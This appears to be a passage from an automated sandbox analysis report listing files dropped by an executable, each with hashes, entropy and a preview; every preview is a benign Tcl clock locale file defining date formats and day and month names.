                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_DO DATE_FORMAT "%m/%d/%Y".. ::msgcat::mcset es_DO TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_DO DATE_TIME_FORMAT "%m/%d/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.915857529388286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xozgzvFjoro+3v6ry/5oz9+3v9f6HyFvn:4EnLB383OgzdkF3v6ry/OI3vMSVn
                                                                                                                                                                                                                              MD5:94B713B1560FE7711EA746F1CEBD37CD
                                                                                                                                                                                                                              SHA1:E7047E8F04D731D38FA328FBC0E1856C4A8BB23D
                                                                                                                                                                                                                              SHA-256:52AB5A6C9DD4F130A75C049B3AF8F54B84071FC190374BCCF5FA0E1F3B91EB21
                                                                                                                                                                                                                              SHA-512:EE807D4D74A609F642CC3C6FC3D736708F67A6931DEB95288AB5822DA256BE4C908A346036195CF4266408458906D28BB5C715EEAFCACFC4FE45D4E6D8E435FE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_EC DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_EC TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_EC DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.9102355704853435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xohvjbmvFjoI3v6ry/5oho+3vjb0f6HyFvn:4EnLB383KmdJ3v6ry/W3vbSVn
                                                                                                                                                                                                                              MD5:761D0A468DF2EE75BC2CAB09D5FF38CD
                                                                                                                                                                                                                              SHA1:D627BE45FE71CCB3CA53153393C075FF5136C2F3
                                                                                                                                                                                                                              SHA-256:19B4D3025156C060A16328370A3FDB9F141298DECFC8F97BE606F6438FECE2EE
                                                                                                                                                                                                                              SHA-512:6CF7C9004A8A3B70495862B7D21921B1A6263C2153FEBC5C4997366498ABBFE70263B436C2B4998550780A4C3A58DCF0AAE7420FF9D414323D731FA44BD83104
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_GT DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_GT TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_GT DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.947925914291734
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoIvriSFjoP3v6ry/5oIo+3vrig6HyFvn:4EnLB383V+2m3v6ry/v3v+lSVn
                                                                                                                                                                                                                              MD5:33CEE7F947A484B076F5FA7871A30FEB
                                                                                                                                                                                                                              SHA1:F77F8D1F42008770A6FF1F5097C863ECF482BEBE
                                                                                                                                                                                                                              SHA-256:07873D4D59BB41000706A844859C73D26B1FF794058AA83CFFCA804981A24038
                                                                                                                                                                                                                              SHA-512:EBF6873F9CB554489EFCD352943100C00171E49D27153769D1C4DB25E2D1F44F2D34869B596C267C9BB59ED0444468D9982137CFB1C6035FB15A855BB867133B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_HN DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_HN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_HN DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.9102355704853435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoPjbmvFjoH+3v6ry/5oI+3vjb0f6HyFvn:4EnLB383UmdD3v6ry/k3vbSVn
                                                                                                                                                                                                                              MD5:678D7A6DC32355246BF3AC485A24AF4D
                                                                                                                                                                                                                              SHA1:B6C273D3BE5FB9F5A221B0333870CCE41CEDFDE4
                                                                                                                                                                                                                              SHA-256:A0F57137D2C0ABDC933E03CFB188F5632176C195CEADB9DC80D469C8DC6CEDC6
                                                                                                                                                                                                                              SHA-512:571404CCB0591C681C975E3F7A6C6972FAF2362F1D48BFC95E69A9EAE2DB3F40BF4B666C41950C4924E3FD820C61ED91204F92283B8554F1BD35B64D53BD4125
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_MX DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_MX TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_MX DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.918215906418583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoe/GriSFjo3W3v6ry/5oe/T+3vrig6HyFvn:4EnLB383Re+2eW3v6ry/RS3v+lSVn
                                                                                                                                                                                                                              MD5:471C41907CE5DB1F30C647A789870F78
                                                                                                                                                                                                                              SHA1:C575A639609620AF7C56430991D0E4C2B50BDEC5
                                                                                                                                                                                                                              SHA-256:6250663DA1378E54BEDCEF206583D212BC0D61D04D070495238D33715BB20CAE
                                                                                                                                                                                                                              SHA-512:CAE32DF8F583542CAFE3292501725D85B697A5C1F9A0A7993490E8A69B6CE5CE3DE3AA2733B14D989A8D13B5E31B437DB42E9AB9D1851FE72313592C752B5061
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_NI DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_NI TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_NI DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.906719336603863
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoX5rQZ2joHE3v6ry/5oXa+3vrQZg6HyFvn:4EnLB383ak4F3v6ry/G3vkrSVn
                                                                                                                                                                                                                              MD5:571F6716293442672521F70854A5AD05
                                                                                                                                                                                                                              SHA1:525EBDEA6F85FC769B6C0C0B179BD98381647123
                                                                                                                                                                                                                              SHA-256:EBB661C1C09E7D4F6FBCC4B2DAD0F41442B1FFDD27F003ABDC0375DD316E57D7
                                                                                                                                                                                                                              SHA-512:C6176EE48515BDFC09B8347DAC5FD2C0165AA765916457DC7B057E526785AC912481CB72F118D2943372213B23CE3C39739263C2B3DA4DBFEB24C522ACC0439D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PA DATE_FORMAT "%m/%d/%Y".. ::msgcat::mcset es_PA TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PA DATE_TIME_FORMAT "%m/%d/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.90959433688075
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoIgzvFjoQ9X3v6ry/5oI9+3v9f6HyFvn:4EnLB383+zdB3v6ry/y3vMSVn
                                                                                                                                                                                                                              MD5:5A5997D834DDD3E2E8FF8C6956AD54AC
                                                                                                                                                                                                                              SHA1:AB4110E37B3665D738A8F2B3E64CBA9E99127301
                                                                                                                                                                                                                              SHA-256:90C130B66958CF63CB3DDD2C633E58444357DBAB44C56831DD794CBD2EB1AED0
                                                                                                                                                                                                                              SHA-512:1FEB8E77EA7B886E4A06279AC8A4B6200DBB86DCD28989651B92A0C9147A7BCFBB871DF8F904A1CF8F869BFFBD21325505AC44A4DBEBE1EFC87D43174597F1F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PE DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_PE TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.905689521403511
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xo06GriSFjoeW3v6ry/5o06T+3vrig6HyFvn:4EnLB383gG+263v6ry/gK3v+lSVn
                                                                                                                                                                                                                              MD5:CE811BB8D12C7E6D53338759CCFB0A22
                                                                                                                                                                                                                              SHA1:0AED290AA479DE6887CCB58D3F0A0F379EF8D558
                                                                                                                                                                                                                              SHA-256:F790E8E48DC079DCD7DEB58170561006A31294F7E4ACBF9CF2ABFA3DB9E3FA9E
                                                                                                                                                                                                                              SHA-512:0C73654CC3D33F76D9BF545BD6C5E42CBDD10B6D9750BFD6536806010F3B6A3C3647FB9D5E7E75A39823FDB857E13D07B7F987809C94B9F980E6D3A6D3108E85
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PR DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_PR TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PR DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.917539255090736
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xo/5zvFjovE3v6ry/5o/a+3v9f6HyFvn:4EnLB383Czdt3v6ry/+3vMSVn
                                                                                                                                                                                                                              MD5:9CD6FAC4121E3D287C87157142E32845
                                                                                                                                                                                                                              SHA1:3081FE2197017EC8E052756A407880C1C4ED026A
                                                                                                                                                                                                                              SHA-256:70263F7EB22822DFEE8849B7AC4418ED9331275A71E77236B59226396505CDFF
                                                                                                                                                                                                                              SHA-512:25DC054085C4078734988EEDD87E31ABE93DA8B43512E924DE4BCDE9F8EC670436B72FAD1855484F9AC71DD0BEDD9ED30304D02219C4FFC4B0516D8889BDF9F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PY DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_PY TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.929035824905457
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xofriSFjo3+3v6ry/5oY+3vrig6HyFvn:4EnLB383Y+22+3v6ry/Q3v+lSVn
                                                                                                                                                                                                                              MD5:AF300EA6E733DC6820768EA16194B472
                                                                                                                                                                                                                              SHA1:7766A6EB3D07BCC759CF6718EF3D6EC3FCE13565
                                                                                                                                                                                                                              SHA-256:26A38B3745C95673D21BABB987F1D41EE08DDA945C670F5432BA0CE6F893C0E9
                                                                                                                                                                                                                              SHA-512:C38D67C912584BE539D71881C6517AC186CBB336A160602DA716CE2708B2D38CE8FA7DD23EDB98890ABB7119B924B6C7816C18EC18F20C49D6284DF2386E32EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_SV DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_SV TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_SV DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.923802447598272
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xooygzvFjooq9X3v6ry/5ooy9+3v9f6HyFvn:4EnLB3835rzdbsX3v6ry/5J3vMSVn
                                                                                                                                                                                                                              MD5:2DC550FEC3F477B1159B824479BCE707
                                                                                                                                                                                                                              SHA1:4D0B20CF3E50B64D74655A405A7750E0B0BB4375
                                                                                                                                                                                                                              SHA-256:1291B58810739EA0651493DD7887F5EE3E14BDB806E06DD4BB8AE2520C742EDA
                                                                                                                                                                                                                              SHA-512:B12B927ACA6274904928A6A6CAEC8339A794C74A1F1804FF93AABC132AF9AD8AC5117F20067A60EFEBC9887150D7ACA5BE9643FF61509666011FD203211C25B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_UY DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_UY TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_UY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.928484426267027
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoXrzvFjoXK3v6ry/5oXs+3v9f6HyFvn:4EnLB3838zdv3v6ry/c3vMSVn
                                                                                                                                                                                                                              MD5:184D6C4B9F0AA874DEB959F63F7CC01B
                                                                                                                                                                                                                              SHA1:5FB370B498289590C977F6B489FF646F0FB27425
                                                                                                                                                                                                                              SHA-256:91191517403C712299919F9C797F952502E33CB6961D1DBEE3A7C9E8D2B170B9
                                                                                                                                                                                                                              SHA-512:881CCAB0950AE993744ECCA141120C005F53D684167A3E5CBDDF950D110D630FB2B4F6AE6E3D0E06D5110AE25EA00A4F4DAFB03AD3B227DC8C63464D434431DA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_VE DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_VE TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_VE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1258
                                                                                                                                                                                                                              Entropy (8bit):4.391217201307309
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83P1Y2+1YoQVTsC/m48qpRTVTR7I/68qqq4Z0yoN7emG5wsvtqmsv5t:43P1p+1jQ9sq8y9v8Yko7emG5wKtqmKX
                                                                                                                                                                                                                              MD5:C8C5EF2FA6DD8DBD5BBD2699BE1A0BF6
                                                                                                                                                                                                                              SHA1:F5E26B40786B8987C98F9CBDEF5522043574A9ED
                                                                                                                                                                                                                              SHA-256:4BEE224C21B0483CFF39BE145C671AA20CB7872C8727FD918C0E8ECA2BBEB172
                                                                                                                                                                                                                              SHA-512:757FA85C137A11C1A3F4A8392C7A4E4030A67D0E593FA25A98BEC07DB295399AB2C0D9EBE61E07420B14387A29C060DC3AF812A1E7B85110DBB13C3C3DCB3600
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset et DAYS_OF_WEEK_ABBREV [list \.. "P"\.. "E"\.. "T"\.. "K"\.. "N"\.. "R"\.. "L"].. ::msgcat::mcset et DAYS_OF_WEEK_FULL [list \.. "p\u00fchap\u00e4ev"\.. "esmasp\u00e4ev"\.. "teisip\u00e4ev"\.. "kolmap\u00e4ev"\.. "neljap\u00e4ev"\.. "reede"\.. "laup\u00e4ev"].. ::msgcat::mcset et MONTHS_ABBREV [list \.. "Jaan"\.. "Veebr"\.. "M\u00e4rts"\.. "Apr"\.. "Mai"\.. "Juuni"\.. "Juuli"\.. "Aug"\.. "Sept"\.. "Okt"\.. "Nov"\.. "Dets"\.. ""].. ::msgcat::mcset et MONTHS_FULL [list \.. "Jaanuar"\.. "Veebruar"\.. "M\u00e4rts"\.. "Aprill"\.. "Mai"\.. "Juuni"\.. "Juuli"\.. "August"\.. "September"\.. "Oktoober"\.. "November"\.. "De
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1032
                                                                                                                                                                                                                              Entropy (8bit):4.002617252503668
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83DEXk8TT7vXk8TTMtzCIsOo/ssP6tvf1I49sHT:434bTbbTc+RjKi4mz
                                                                                                                                                                                                                              MD5:ED9805AF5BFB54EB28C6CB3975F86F5B
                                                                                                                                                                                                                              SHA1:2BD91BD850028712F35A2DDB2555036FBF6E8114
                                                                                                                                                                                                                              SHA-256:6889B57D29B670C6CFB7B5A3F2F1749D12C802E8E9629014D06CE23C034C7EF1
                                                                                                                                                                                                                              SHA-512:16F31DE5D2B0D3ED2D975C7891C73C48F073CDAC28F17572FC9424C2D384DDFE9E5E235F17C788F42840CB2D819D2D9499B909AB80FEF1B09F2AE1627CF1DADC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eu DAYS_OF_WEEK_ABBREV [list \.. "igandea"\.. "astelehena"\.. "asteartea"\.. "asteazkena"\.. "osteguna"\.. "ostirala"\.. "larunbata"].. ::msgcat::mcset eu DAYS_OF_WEEK_FULL [list \.. "igandea"\.. "astelehena"\.. "asteartea"\.. "asteazkena"\.. "osteguna"\.. "ostirala"\.. "larunbata"].. ::msgcat::mcset eu MONTHS_ABBREV [list \.. "urt"\.. "ots"\.. "mar"\.. "api"\.. "mai"\.. "eka"\.. "uzt"\.. "abu"\.. "ira"\.. "urr"\.. "aza"\.. "abe"\.. ""].. ::msgcat::mcset eu MONTHS_FULL [list \.. "urtarrila"\.. "otsaila"\.. "martxoa"\.. "apirila"\.. "maiatza"\.. "ekaina"\.. "uztaila"\.. "abuztua"\.. "iraila"\.. "urria"\.. "azaroa"\..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):294
                                                                                                                                                                                                                              Entropy (8bit):4.915392589807169
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoszFnJF+l6VvBoszw3vLjoszw3v6mjosz++3v/RHvn:4EnLB383FL+l6VQ3vO3v6G3vZPn
                                                                                                                                                                                                                              MD5:4C91AA000D4316585893025CBB96E910
                                                                                                                                                                                                                              SHA1:3D4E73839A1A8CB9DEC1E59D9D2813257D9480F0
                                                                                                                                                                                                                              SHA-256:D45CC432E5743E6CEC34E9A1E0F91A9D5C315CDA409E0826B51AD9D908479EB6
                                                                                                                                                                                                                              SHA-512:0731F2EEB22ADC7EF8AF215B9EB4C5A66B33BC90E4F80CF7AA482AD002CB30543547230124A0507EC79EDDD6903A042EDA5D7C8AFD77F7FC994EFC6853FABB05
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eu_ES DATE_FORMAT "%a, %Yeko %bren %da".. ::msgcat::mcset eu_ES TIME_FORMAT "%T".. ::msgcat::mcset eu_ES TIME_FORMAT_12 "%T".. ::msgcat::mcset eu_ES DATE_TIME_FORMAT "%y-%m-%d %T %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1711
                                                                                                                                                                                                                              Entropy (8bit):4.21837106187395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83CnMqnbxbGwgjSyiY/Xw2mS1yM/8ye48YyfNqTb2gyj/8yHkQp:43Yzyhgvs9yi4P
                                                                                                                                                                                                                              MD5:7AB25F4E7E457469DC61A33176B3AA72
                                                                                                                                                                                                                              SHA1:EEA98283D250A99E33DD4D5D9B1B76A029716CE6
                                                                                                                                                                                                                              SHA-256:86898728B275288693B200568DC927C3FF5B9050690876C4441A8339DAE06386
                                                                                                                                                                                                                              SHA-512:7524437F91E91751BEB7A378D7674C49E5D84B716FE962F4C23580C46A671F3F33638FCD37A8F90C86E24DA8F54448E06AC9C3AEFFB5613E94A04E512C1AD68D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa DAYS_OF_WEEK_ABBREV [list \.. "\u06cc\u2214"\.. "\u062f\u2214"\.. "\u0633\u2214"\.. "\u0686\u2214"\.. "\u067e\u2214"\.. "\u062c\u2214"\.. "\u0634\u2214"].. ::msgcat::mcset fa DAYS_OF_WEEK_FULL [list \.. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\.. "\u062f\u0648\u0634\u0646\u0628\u0647"\.. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\.. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\.. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\.. "\u062c\u0645\u0639\u0647"\.. "\u0634\u0646\u0628\u0647"].. ::msgcat::mcset fa MONTHS_ABBREV [list \.. "\u0698\u0627\u0646"\.. "\u0641\u0648\u0631"\.. "\u0645\u0627\u0631"\.. "\u0622\u0648\u0631"\.. "\u0645\u0640\u0647"\.. "\u0698\u0648\u0646"\.. "\u0698\u0648\u06cc"\.. "\u0627\u0648\u062a
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2009
                                                                                                                                                                                                                              Entropy (8bit):4.491667766230948
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83KnMqnbxbGUgjDiY/Xw2mS1yM/8ye48tfNqTb2gyj/8yHkQLoRv9v/vNv0P:43wihgvsai4Rmv53JU
                                                                                                                                                                                                                              MD5:C59EE7CA80AD9F612A21C8B6674A820E
                                                                                                                                                                                                                              SHA1:AEFD631EFC1892063244FA622DE1A091C461E370
                                                                                                                                                                                                                              SHA-256:6B56545C1AE1DE53BC2389BB7AE59F115BADE24F907E384E079491DC77D6541D
                                                                                                                                                                                                                              SHA-512:42F52091480599D317FB80DF8E52A6C6F88614C6172BF4033974DD136FB30E6F47D38982C8A7BC14CF3165C3EBAE3680F94DF3A0ED079AB68165286251CD0BD7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa_IN DAYS_OF_WEEK_ABBREV [list \.. "\u06cc\u2214"\.. "\u062f\u2214"\.. "\u0633\u2214"\.. "\u0686\u2214"\.. "\u067e\u2214"\.. "\u062c\u2214"\.. "\u0634\u2214"].. ::msgcat::mcset fa_IN DAYS_OF_WEEK_FULL [list \.. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\.. "\u062f\u0648\u0634\u0646\u0628\u0647"\.. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\.. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\.. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\.. "\u062c\u0645\u0639\u0647"\.. "\u0634\u0646\u0628\u0647"].. ::msgcat::mcset fa_IN MONTHS_ABBREV [list \.. "\u0698\u0627\u0646"\.. "\u0641\u0648\u0631"\.. "\u0645\u0627\u0631"\.. "\u0622\u0648\u0631"\.. "\u0645\u0640\u0647"\.. "\u0698\u0648\u0646"\.. "\u0698\u0648\u06cc"\.. "\u0627\u0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
